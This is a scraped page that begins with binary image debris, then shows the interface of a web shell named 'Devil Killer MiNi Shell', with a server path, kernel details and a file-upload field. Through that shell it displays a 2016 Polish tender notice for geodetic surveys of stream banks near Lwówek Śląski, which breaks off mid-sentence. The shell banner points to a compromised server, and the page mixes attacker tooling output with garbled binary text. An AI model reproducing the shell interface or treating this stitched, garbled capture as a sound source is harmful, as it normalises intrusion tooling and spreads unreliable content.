JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160615/86803-N-2016.html

<p class="kh_header"><b>Lwówek Śląski: Usługa geodezyjna-obustronne ustalenie linii brzegu cieków:Łazek,Srebrna,Rakówka i Bobrzyca wraz z uregulowaniem sposobu użytkowania nieruchomości przyległych do cieku.</b><br>
<b>Numer ogłoszenia: 86803 - 2016; data zamieszczenia: 15.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu Oddział w Lwówku Śląskim , ul. Jaśkiewicza 24, 59-600 Lwówek Śląski, woj. dolnośląskie, tel. 075 7824602, 7824603, faks 075 782 4506.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzmiuw.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialneo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa geodezyjna-obustronne ustalenie linii brzegu cieków:Łazek,Srebrna,Rakówka i Bobrzyca wraz z uregulowaniem sposobu użytkowania nieruchomości przyległych do cieku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z następujących części:I.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Łazek w km 7+580-8+380 w obrębie m. Pisarzowice, gm. Lubań.II.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Srebrna w km 9+200-9+500 w obrębie m. Pławna Górna, gm. Lubomierz i m. Płóczka, gm. Lwówek Śląski.III.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Rakówka w km 0+980-1+910 w obrębie m. Rakowice Wielkie, gm. Lwówek Śląski.IV.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Bobrzyca w km 20+500-21+800 w obrębie m. Raciborowice Dolne, gm. Warta Bolesławiecka.Zakres prac dla zamówienia w części I-IV obejmuje m.in.:- ustalenie linii brzegowej cieku zgodnie z art. 15 ustawy z dnia 18 lipca 2001 Prawo wodne (Dz. U. z 2015r. poz. 469 ze zm.);- rozliczenie powierzchni powstałych w wyniku rozgraniczenia gruntów pod powierzchniowa wodą płynącą od gruntów sąsiednich wraz z nadaniem (w razie konieczności) nowych numerów działek lub ich scalenia, dokonanie zmiany sposobu użytkowania (również na starorzeczach) - ustanowienie odpowiedniego użytku,- sporządzenie wykazu zmian danych ewidencyjnych gruntów wg stanu obecnego, uwidocznionego 
w ewidencji gruntów i budynków oraz stanu nowego, powstałego po rozgraniczeniu,
- przedłożenie Zamawiającemu kopii Projektu rozgraniczenia o wydanie decyzji zatwierdzających linię brzegową (kompletny),- przedłożenie w imieniu Zamawiającego odpowiedniemu organowi kompletnego wniosku o wydanie decyzji zatwierdzających linię brzegową,- sporządzenie dokumentacji formalno- prawnej. Wykonawca wykona prace geodezyjne zgodnie z obowiązującymi normami i przepisami, w tym 
szczególnie z:- Ustawą z dnia 17 maja 1989r. - Prawo geodezyjne  i kartograficzne (Dz. U. z 2015 poz. 520),- Ustawą z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami   (t. j. Dz. U. z 2015r. poz. 1174 ze zm.),- Ustawą z dnia 18.07.2001r. Prawo wodne (Dz. U. z 2015r. poz. 469 ze zm.).Wykonawca zobowiązany będzie do złożenia wniosku do Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej o wydanie materiałów geodezyjnych niezbędnych do realizacji umowy w terminie 7 dni (licząc od dnia zawarcia umowy).
Wszystkie koszty związane z realizacją usługi, w tym koszty materiałów pobranych z Powiatowego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej pokrywa Wykonawca.Lokalizacja działek objętych zamówieniem możliwa jest do sprawdzenia na ogólnodostępnej stronie internetowej: www.geoportal.gov.pl. Zakres prac dla wszystkich części zamówienia zostały określone w części V niniejszej SIWZ. Podane przez Zamawiającego orientacyjne wykazy działek mogą odbiegać od rzeczywistości w terenie, dlatego Zamawiający zaleca przede wszystkim wizję w terenie dla każdej z części oraz skalkulowanie w ofercie ewentualnych rozbieżności pomiędzy podanym orientacyjnym wykazem działek a stanem faktycznym w terenie. Za wykonanie usługi Zamawiający będzie uważał: przedstawioną kopię wniosku o ustalenie linii brzegowej cieku wraz z załączonym zawiadomieniem o zakończeniu prac z potwierdzoną datą wpływu do właściwego organu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia.Zamawiający uzna za spełniony warunek dotyczący wiedzy i doświadczenia, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenia dowodów (w formie oryginału lub kopii poświadczonych za zgodność z oryginałem) potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (m.in. poświadczenia, oświadczenia, referencje, inne) wykonał usługi polegające na:- ustaleniu linii brzegowej cieku dla minimum 4-ch obiektów (jako obiekt Zamawiający będzie uważał ciek lub jego część, dla którego ustalono linię brzegową, a Starosta Powiatu wydał prawomocną decyzję). W zakresie wykazania spełniania przez Wykonawcę tego warunku należy przedłożyć dokumenty określone w pkt 8. 1.2 niniejszej SIWZ.
      
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz wyjaśnienia (dotyczy wiedzy i doświadczenia) w jakiej formie zostanie ona przekazana. Dokument powinien zawierać wyraźne nawiązanie do uczestnictwa w dowolnej, dozwolonej przez prawo formie (jako podwykonawca, doradca czy na innej podstawie) w wykonaniu zamówienia. Zobowiązanie ma zawierać następujące informacje:
      a) zakres dostępnych wykonawcy zasobów innego podmiotu,
      b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
      c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
      d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku. O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia. Zamawiający uzna za spełniony warunek dotyczący posiadania osób zdolnych do wykonania zamówienia, jeżeli wykonawca wykaże, że dysponuje osobą posiadającą kwalifikacje zawodowe w dziedzinie geodezji 
i kartografii.Zamawiający uzna warunek za spełniony o ile wykonawca złoży wykaz, którego wzór stanowi załącznik Nr 5 - część IV SIWZ Formularze. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. oraz wyjaśnienia (dotyczy wiedzy i doświadczenia) w jakiej formie zostanie ona przekazana. Dokument powinien zawierać wyraźne nawiązanie do uczestnictwa w dowolnej, dozwolonej przez prawo formie (jako podwykonawca, doradca czy na innej podstawie) w wykonaniu zamówienia. Zobowiązanie ma zawierać następujące informacje:a) zakres dostępnych wykonawcy zasobów innego podmiotu,b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia, c) charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.Wykonawcy mogą wspólnie ubiegać się o zamówienie.W przypadku udziału w postępowaniu Wykonawców występujących wspólnie, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania 
w postępowaniu o udzielenie zamówienia i podpisania umowy w sprawie zamówienia publicznego. W przypadku udziału w postępowaniu Wykonawców występujących wspólnie, Zamawiający dopuszcza możliwość łącznego spełniania i dokumentowania ww. warunków.Okoliczności uzasadniające wykluczenie z postępowania w oparciu o przepisy art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych zachodzące choćby względem pojedynczego Wykonawcy dyskwalifikują całą grupę Wykonawców ubiegających się wspólnie o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku: 1) jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa lub wystąpienia okoliczności o których mowa w § 6 ust. 5 umowy,
2) zmiany terminu realizacji przedmiotu zamówienia spowodowane warunkami atmosferycznymi,   geologicznymi, archeologicznymi, a w szczególności:a) klęski żywiołowe;b) warunki atmosferyczne uniemożliwiające prowadzenie prac, gwałtowne opady deszczu, burze, gradobicie, wysokie stany wód, itp.;3)zmiany wynagrodzenia:
a) wystąpienia okoliczności o których mowa w § 4 ust. 7, w § 6 ust. 7 i w § 7 ust. 1 umowy,4)   zmiany osobowe:a) zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego   dysponującego, co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym; b) zmiany osób do nadzorowania prac.5) Pozostałe zmiany a) zmiana dokonywania płatności na rzecz Wykonawcy 2. Do zmiany umowy dochodzi wskutek wniosku jednej ze stron, zawierającego opis zmiany oraz jej uzasadnienie. Wszelkie zmiany umowy są dokonywane  w formie pisemnej, w drodze aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzmiuw.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu, Oddział w Lwówku Śląskim, ul. Jaśkiewicza 24, 59-600 Lwówek Śląski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2016 godzina 10:30, miejsce: sekretariat w siedzibie Zamawiającego w Dolnośląskim Zarządzie Melioracji i Urządzeń Wodnych, Oddziale w Lwówku Śląskim ul. Jaśkiewicza 24, 59-600 Lwówek Śląski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Łazek w km 7+580-8+380 w obrębie m. Pisarzowice, gm. Lubań..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: - ustalenie linii brzegowej cieku zgodnie z art. 15 ustawy z dnia 18 lipca 2001r. Prawo wodne (tekst jednolity Dz. U. z 2015r., poz. 469 ze zm.); - rozliczenie powierzchni powstałych w wyniku rozgraniczenia gruntów 
pod powierzchniową wodą płynącą od gruntów sąsiednich wraz z nadaniem 
(w razie konieczności) nowych numerów działek lub ich scalenia, dokonanie zmian sposobu użytkowania (również na starorzeczach) - ustanowienie odpowiedniego użytku, - sporządzenie wykazu zmian danych ewidencyjnych gruntów wg stanu obecnego,  uwidocznionego w ewidencji gruntów i budynków oraz stanu nowego, powstałego po rozgraniczeniu; - sporządzenie dokumentacji formalno-prawnej. Lokalizacja działek objętych zamówieniem możliwa jest do sprawdzenia na ogólnodostępnej stronie internetowej: http://geoportal.dolnyslask.pl/imap/ Za wykonanie usługi Zamawiający będzie uważał:przedstawioną kopię wniosków o ustalenie linii brzegowej cieku wraz z załączonym zawiadomieniem o zakończeniu prac z potwierdzoną datą wpływu do właściwego organu.Wnioski o ustalenie linii brzegowej powinny zostać przygotowane oddzielnie dla każdego właściciela nieruchomości. Podane przez Zamawiającego orientacyjne wykazy działek mogą odbiegać od rzeczywistości w terenie, dlatego Zamawiający zaleca przede wszystkim wizję w terenie dla każdej z części oraz skalkulowaniew ofercie ewentualnych rozbieżności pomiędzy podanym orientacyjnym wykazem działek a stanem faktycznym w terenie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II.Usługa geodezyjna polegająca na obustronnym ustaleniu linii brzegu cieku Srebrna w km 9+200-9+500 w obrębie m. Pławna Górna, gm. Lubomierz i m. Płóczka, gm. Lwówek Śląski..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: - ustalenie linii brzegowej cieku zgodnie z art. 15 ustawy z dnia 18 lipca 2001r. Prawo wodne (tekst jednolity Dz. U. z 2015r., poz. 469 ze zm.); - rozliczenie powierzchni powstałych w wyniku rozgraniczenia gruntów 
pod powierzchniową wodą płynącą od gruntów sąsiednich wraz z nadaniem 
(w razie konieczności) nowych numerów działek lub ich scalenia, dokonanie zmian sposobu użytkowania (również na starorzeczach) - ustanowienie odpowiedniego użytku, - sporządzenie wykazu zmian danych ewidencyjnych gruntów wg stanu obecnego,  uwidocznionego w ewidencji gruntów i budynków oraz stanu nowego, powstałego po rozgraniczeniu; - sporządzenie dokumentacji formalno-prawnej. Lokalizacja działek objętych zamówieniem możliwa jest do sprawdzenia na ogólnodostępnej stronie internetowej: http://geoportal.dolnyslask.pl/imap/ Za wykonanie usługi Zamawiający będzie uważał: przedstawioną kopię wniosków o ustalenie linii brzegowej cieku wraz z załączonym zawiadomieniem o zakończeniu prac z potwierdzoną datą wpływu do właściwego organu. Wnioski o ustalenie linii brzegowej powinny zostać przygotowane oddzielnie dla każdego właściciela nieruchomości. Podane przez Zamawiającego 